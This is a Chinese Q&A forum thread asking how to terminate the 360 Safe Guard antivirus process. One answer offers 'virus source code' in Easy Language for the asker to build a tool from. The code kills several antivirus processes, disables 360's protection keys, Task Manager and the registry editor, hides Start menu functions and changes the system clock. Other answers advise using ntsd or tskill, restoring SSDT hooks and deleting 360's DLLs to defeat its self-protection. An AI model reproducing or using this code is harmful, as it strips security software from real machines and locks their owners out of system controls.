270分!求能结束360安全卫士进程的工具!
发布网友
发布时间:2022-05-05 15:39
我来回答
共5个回答
热心网友
时间:2022-06-27 17:05
快捷键Ctrl+Del打开任务管理器,我因为没安装360,所以进程里没有此项目,楼主可在任务管理器中找到此项目,单机又下角的结束进程即可结束360,回答完毕OVER!!!!
追问这个连telnet上调用taskkill都不如啊
热心网友
时间:2022-06-27 17:05
下面是结束360进程的一种病毒的源码(易语言)。你自己拿这个编个软件就可以了。
绕过杀毒软件防御:
运行 (“taskkill /f /im kavsvc.exe”, 假, 1)
运行 (“taskkill /f /im KVXP.kxp”, 假, 1)
运行 (“taskkill /f /im Rav.exe”, 假, 1)
运行 (“taskkill /f /im Ravmon.exe”, 假, 1)
运行 (“taskkill /f /im Mcshield.exe”, 假, 1)
运行 (“taskkill /f /im VsTskMgr.exe”, 假, 1)
修改系统时间:
置现行时间 (到时间 (“8888年8月8日”))
禁用任务管理器:
写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, 0)
禁用注册表:
写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\System\Disableregistrytools”, 1)
隐藏开始中的运行 禁止WIN2000/XP通过任务管理器创建新任务:
写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, 1)
隐藏“MS-DOS方式”下的磁盘驱动器。不管是在“我的电脑”里,或“MS-DOS”方式下都看不见了:
写注册项 (3, “SoftWare \Microsoft \Windows \CurrentVersion \Policies\WinOldApp\Disabled”, 1)
隐藏开始中的关机:
写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose”, 1)
隐藏开始中的搜索:
写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, 1)
OVER360防御:
写注册项 (4, “SOFTWARE\360Safe\safemon\ExecAccess”, 0)
写注册项 (4, “SOFTWARE\360Safe\safemon\MonAccess”, 0)
写注册项 (4, “SOFTWARE\360Safe\safemon\SiteAccess”, 0)
写注册项 (4, “SOFTWARE\360Safe\safemon\UDiskAccess”, 0)
结束360进程
运行 (“taskkill /f /im 360tray.exe”, 假, 1)
热心网友
时间:2022-06-27 17:06
如楼主所说,一般任务管理器结束安全卫士进程的方法行不通,一般只有通过专业工具wsyscheck或者兵刃也许可以达到效果,由于360有主动防御,建议在用工具结束后找到其依存的进程,将其中对应的dll文件删除,还有记得要把钩子去掉。最后360有主动防御,一般来说是通过修改SSDT表来做到的,wsyscheck和兵刃都可以还原SSDT,楼主可以试试。这样一套程序下来的话,估计卫视已经完蛋了
热心网友
时间:2022-06-27 17:06
开个cmd.exe窗口,输入:
ntsd -c q -p PID
把最后那个PID,改成你要终止的进程的ID。如果你不知道进程的ID,任务管理器->进程选项卡->查看->选择列->勾上"PID(进程标识符)",然后就能看见了。
xp下还有两个好东东tasklist和tskill。tasklist能列出所有的进程,和相应的信息。tskill能查杀进程,语法很简单:tskill 程序名!
使用专门的软件来杀进程
任务管理器杀不掉的进程,你可以使用专门的软件关闭。有很多软件可以杀进程,例如进程杀手、IceSword、柳叶擦眼、系统查看大师、Kill process等
热心网友
时间:2022-06-27 17:07
你好。 有一些高等级的进程,tskill和taskkill或许无法结束,那么我们还有一个更强大的工具,那就是系统debug级的ntsd。
利用进程PID结束进程
命令格式:ntsd -c q -p pid
命令范例: ntsd -c q -p 1496
利用进程名结束进程
命令格式:ntsd -c q -pn ***.exe (***.exe 为进程名,exe不能省)
命令范例:ntsd -c q -pn explorer.exe
再编写批处理就可以了。
参考资料:http://ke.baidu.com/view/1044635.htm